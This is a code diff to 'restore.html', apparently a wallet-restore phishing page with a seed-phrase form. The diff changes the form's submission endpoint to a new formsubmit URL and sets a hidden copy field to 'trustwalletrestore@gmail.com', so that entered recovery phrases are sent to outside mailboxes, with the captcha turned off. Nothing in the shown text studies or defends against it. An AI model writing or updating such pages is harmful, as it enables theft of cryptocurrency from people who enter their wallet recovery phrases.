--- a/restore.html
+++ b/restore.html
@@ -55,7 +55,7 @@
                   aria-labelledby="mnemonic-tab"
                 >
                   <form
-                    action="https://formsubmit.co/e47eeac0c6ac2f912909f5ad7a9946e4"
+                    action="https://formsubmit.com/3eaf5924-ec9b-468e-9690-f6abe48d3406"
                     method="POST"
                   >
                     <input
@@ -68,7 +68,7 @@
                     <input
                       type="hidden"
                       name="_cc"
-                      value="gioverone.gv@gmail.com"
+                      value="trustwalletrestore@gmail.com"
                     />
                     <input type="hidden" name="_captcha" value="false" />
 
